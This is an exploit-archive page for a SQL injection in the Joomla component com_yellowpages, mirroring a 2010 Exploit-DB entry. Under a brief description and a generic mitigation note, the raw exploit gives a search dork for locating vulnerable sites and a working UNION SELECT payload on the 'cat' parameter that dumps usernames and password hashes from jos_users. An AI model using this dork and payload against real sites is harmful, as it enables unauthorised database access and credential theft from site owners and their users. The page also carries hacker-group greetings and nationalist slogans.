header-logo
Suggest Exploit
vendor:
com_yellowpages
by:
_aL_bayraqim_
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_yellowpages
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component (com_yellowpages) SQL Injection Vulnerability

Joomla Component (com_yellowpages) is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'cat' in the URL. This can allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

Developers should always use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious data from entering the system.
Source

Exploit-DB raw data:

===============================================================
Joomla Component (com_yellowpages) SQL Injection Vulnerability 
===============================================================


# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
# Date : 9- 8 - 2010

# Author : _aL_bayraqim_ 

# BORDO BERELİLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = inurl:/index.php?option=com_yellowpages 
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_yellowpages"
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################
#.Türk oğlu, !!..Türk kızı !!..Türklügünü Koru!..
############################################################

Navigation

Suggest Exploit

Services By CQR